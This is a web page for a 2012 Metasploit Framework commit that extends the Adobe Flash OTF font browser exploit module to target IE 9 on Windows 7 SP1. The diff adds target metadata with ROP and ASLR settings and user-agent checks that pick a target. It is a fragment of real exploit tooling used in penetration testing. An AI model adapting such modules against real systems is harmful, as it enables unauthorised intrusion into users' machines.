infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

heap spray from flash works pretty well on ie9 too

unstable
jvazquez-r7 2012-08-22 20:47:11 +02:00
parent 730c0e9368
commit 57c6385279
1 changed files with 12 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/exploits/windows/browser/adobe_flash_otf_font.rb
View File

@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
} }
], ],
[ [
'IE 7 on Windows Vista', 'IE 7 on Windows Vista SP2',
{ {
'Rop' => nil 'Rop' => nil
} }
@ -84,6 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote
'Rop' => true, 'Rop' => true,
'ASLR' => true 'ASLR' => true
} }
],
[
'IE 9 on Windows 7 SP1',
{
'Rop' => true,
'ASLR' => true
}
] ]
], ],
'Privileged' => false, 'Privileged' => false,
@ -243,9 +250,11 @@ class Metasploit3 < Msf::Exploit::Remote
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[3] #IE 8 on Windows XP SP3 return targets[3] #IE 8 on Windows XP SP3
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[4] #IE 7 on Windows Vista return targets[4] #IE 7 on Windows Vista SP2
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
return targets[5] #IE 8 on Windows 7 return targets[5] #IE 8 on Windows 7 SP1
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
return targets[6] #IE 9 on Windows 7 SP1
else else
return nil return nil
end end